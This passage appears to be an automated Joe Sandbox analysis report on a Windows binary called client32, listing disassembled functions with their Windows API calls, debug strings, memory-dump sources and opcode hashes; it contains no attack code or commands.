                                                                                • Instruction Fuzzy Hash: 8C21E475A00705AFE710CB61C880BEBB7E4BF8A358F10407DE5AA4B240DB72A440CBA1
                                                                                Function 1105D500 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,1103FE35,?,?,Client,DisableThumbnail,00000000,00000000,Client,DisableWatch,00000000,00000000), ref: 1105D51E
                                                                                • LeaveCriticalSection.KERNEL32(00000000,?,DisableWatch,00000000,00000000,1B702977), ref: 1105D59E
                                                                                • SetEvent.KERNEL32(?,?,DisableWatch,00000000,00000000,1B702977), ref: 1105D5A8
                                                                                Strings
                                                                                • Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d, xrefs: 1105D561
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterEventLeave
                                                                                • String ID: Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d
                                                                                • API String ID: 3094578987-11999416
                                                                                • Opcode ID: c530e27155f7b3fdc2e9ca538483d963ca7dcdd1017b1d5184d653da29544702
                                                                                • Instruction ID: cd8e2c595cb3ca955c0a05eca4a83294a9fb2b4bfc4f95d4b2967c0930ade923
                                                                                • Opcode Fuzzy Hash: c530e27155f7b3fdc2e9ca538483d963ca7dcdd1017b1d5184d653da29544702
                                                                                • Instruction Fuzzy Hash: 6D2149B4500B65AFD364CF6AC490967FBF4FF88718700891EE5AA82B41E375F850CBA0
                                                                                Function 1108D860 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID: Client$DeleteTempUdpFile %s$ImpersonateNetworkDrives
                                                                                • API String ID: 269201875-4101313740
                                                                                • Opcode ID: a45299aa355c05a4a2587e1ef6008b9552bec05414e925fdc7fe9344877070e6
                                                                                • Instruction ID: eaaecb8b70183ecae029b1d74aeae058ca3e84080af2c09da11023f0102635fe
                                                                                • Opcode Fuzzy Hash: a45299aa355c05a4a2587e1ef6008b9552bec05414e925fdc7fe9344877070e6
                                                                                • Instruction Fuzzy Hash: 04217279B442019BE314CBA4CC91F66B3A1BB84718F244A6CE5AD8B3C5CA71F841CB51
                                                                                Function 110B9680 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B969F
                                                                                • MoveWindow.USER32(8D111949,?,?,?,?,00000001,?,?,?,?,?,?,?,?,?,110BA885), ref: 110B96D8
                                                                                • SetTimer.USER32(8D111949,0000050D,000007D0,00000000), ref: 110B9710
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoMoveParametersSystemTimerWindow
                                                                                • String ID: Max
                                                                                • API String ID: 1521622399-2772132969
                                                                                • Opcode ID: ec225463a539bc69afd1be9fe60c0d6d77afb2bfb6e5901e1a463c37379c6f26
                                                                                • Instruction ID: 87ccea237e2aa79ae125a3322bdb2c24729383307459d143463b3682e3a222a8
                                                                                • Opcode Fuzzy Hash: ec225463a539bc69afd1be9fe60c0d6d77afb2bfb6e5901e1a463c37379c6f26
                                                                                • Instruction Fuzzy Hash: A2213DB5A40309AFD714DFA4C885FAFF7B8EB48710F10452EE96597380CB70A941CBA0
                                                                                Function 11125860 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • SendMessageA.USER32(?,000004FF,00000000,00000000), ref: 111258C5
                                                                                • DestroyWindow.USER32(?,00000000,00000000,00000000,00000000,View,BlankAll,00000000,00000000,00000004,00000000,?,?,11125C22,00000000,?), ref: 111258D9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DestroyMessageSendWindow__wcstoi64
                                                                                • String ID: BlankAll$View
                                                                                • API String ID: 321412109-3798095874
                                                                                • Opcode ID: 38df984c28d4ef38a8c37f08fada72d5221e109f2b49a7e4029b6982e407041f
                                                                                • Instruction ID: fa6ce96dcec4713ec44a6fea70dda2fc35063a1a39e070fc1259ad02d852b18a
                                                                                • Opcode Fuzzy Hash: 38df984c28d4ef38a8c37f08fada72d5221e109f2b49a7e4029b6982e407041f
                                                                                • Instruction Fuzzy Hash: 1E1191B5A007066FE3249B768CC0AABF6EDEF48358B90082DF25747650CB74BC40C761
                                                                                Function 11153570 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memmove.LIBCMT ref: 111535AC
                                                                                • _memmove.LIBCMT ref: 111535E6
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memmove$ErrorExitLastMessageProcesswsprintf
                                                                                • String ID: ..\ctl32\WCUNPACK.C$n > 128
                                                                                • API String ID: 6605023-1396654219
                                                                                • Opcode ID: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
                                                                                • Instruction ID: 7dc9b17917a05d0a1a20c6fa4ac0eb705d74e08118df21bf74e35568faeb592c
                                                                                • Opcode Fuzzy Hash: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
                                                                                • Instruction Fuzzy Hash: 0A1125B6C3916577C3818E6A9D85A9BFB68BB4236CF048115FCB817241E771A614C7E0
                                                                                Function 11139860 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InterlockedIncrement.KERNEL32(111F1BC0), ref: 111398B1
                                                                                Strings
                                                                                • Initing VolumeControl Subsystem..., xrefs: 11139898
                                                                                • Inited VolumeControl Subsystem (OK: Ref's already exist)., xrefs: 11139936
                                                                                • Inited VolumeControl Subsystem (OK: 1 Ref)., xrefs: 111398DA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: IncrementInterlocked
                                                                                • String ID: Inited VolumeControl Subsystem (OK: 1 Ref).$Inited VolumeControl Subsystem (OK: Ref's already exist).$Initing VolumeControl Subsystem...
                                                                                • API String ID: 3508698243-2739245937
                                                                                • Opcode ID: f5dded5991a1729abc01e431adb55c9e4ab023a8a7af5cf22b29cff14a83106b
                                                                                • Instruction ID: 8ac7705195b121ec2a8e66f06046531bb3c3c41fe71c89f648c6a83688c0c473
                                                                                • Opcode Fuzzy Hash: f5dded5991a1729abc01e431adb55c9e4ab023a8a7af5cf22b29cff14a83106b
                                                                                • Instruction Fuzzy Hash: 18012B79E0451EA7CB00AFF59D41B9EF768DB82A2DF100A75E419D3A44FB35750087A1
                                                                                Function 110395A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDlgItem.USER32(00000000,00000001), ref: 110395E6
                                                                                • EnableWindow.USER32(00000000,00000000), ref: 110395EE
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                • API String ID: 1136984157-1986719024
                                                                                • Opcode ID: 9301bb4a703dc9f718e6a03bc63426bc399485c21c7871a03d02741ec2ccad78
                                                                                • Instruction ID: 55b3f6273447a840922a2276b3415970a39c2bc3f54fc53508d86eb1e8118ba0
                                                                                • Opcode Fuzzy Hash: 9301bb4a703dc9f718e6a03bc63426bc399485c21c7871a03d02741ec2ccad78
                                                                                • Instruction Fuzzy Hash: C3F0C876640219BFD710CE55DCC6F9BB39CEB88754F108425F61597280D6B1E84087A4
                                                                                Function 11015400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 110AB01D
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                • String ID: ..\ctl32\liststat.cpp$..\ctl32\listview.cpp$m_hWnd
                                                                                • API String ID: 819365019-2727927828
                                                                                • Opcode ID: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
                                                                                • Instruction ID: c68bebcfb275c132091ba8ffe4505af5196cb7164de974b36e44453814cc3cc0
                                                                                • Opcode Fuzzy Hash: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
                                                                                • Instruction Fuzzy Hash: 4DF02B34FC0720AFD720D581EC42FCAB3D4AB05709F004469F5562A2D1E5B0B8C0C7D1
                                                                                Function 110ED470 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsWindow.USER32(?), ref: 110ED498
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastMessageProcessWindowwsprintf
                                                                                • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
                                                                                • API String ID: 2577986331-1331251348
                                                                                • Opcode ID: 7e39479067b6c5f95eacce72c06cd62ac8a6f0ae8e6ec8608ac651044464dd8e
                                                                                • Instruction ID: 93283a680bb1c801d139a1839617fb2f1f19efec68c8bcedb592c4b0da2aa86f
                                                                                • Opcode Fuzzy Hash: 7e39479067b6c5f95eacce72c06cd62ac8a6f0ae8e6ec8608ac651044464dd8e
                                                                                • Instruction Fuzzy Hash: 8DF0E279E036327BD612A9177C0AFCFF768DBA1AA9F058061F80D26101EB34720082E9
                                                                                Function 1103F4C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F466
                                                                                  • Part of subcall function 1103F450: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F47C
                                                                                  • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F484
                                                                                  • Part of subcall function 1103F450: Sleep.KERNEL32(00000014), ref: 1103F497
                                                                                  • Part of subcall function 1103F450: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F4A7
                                                                                  • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F4AF
                                                                                • IsWindow.USER32(00000000), ref: 1103F4EA
                                                                                • SendMessageA.USER32(00000000,0000004A,00000000,00000501), ref: 1103F4FD
                                                                                Strings
                                                                                • DoMMData - could not find %s window, xrefs: 1103F50D
                                                                                • PCIVideoSlave32, xrefs: 1103F508
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
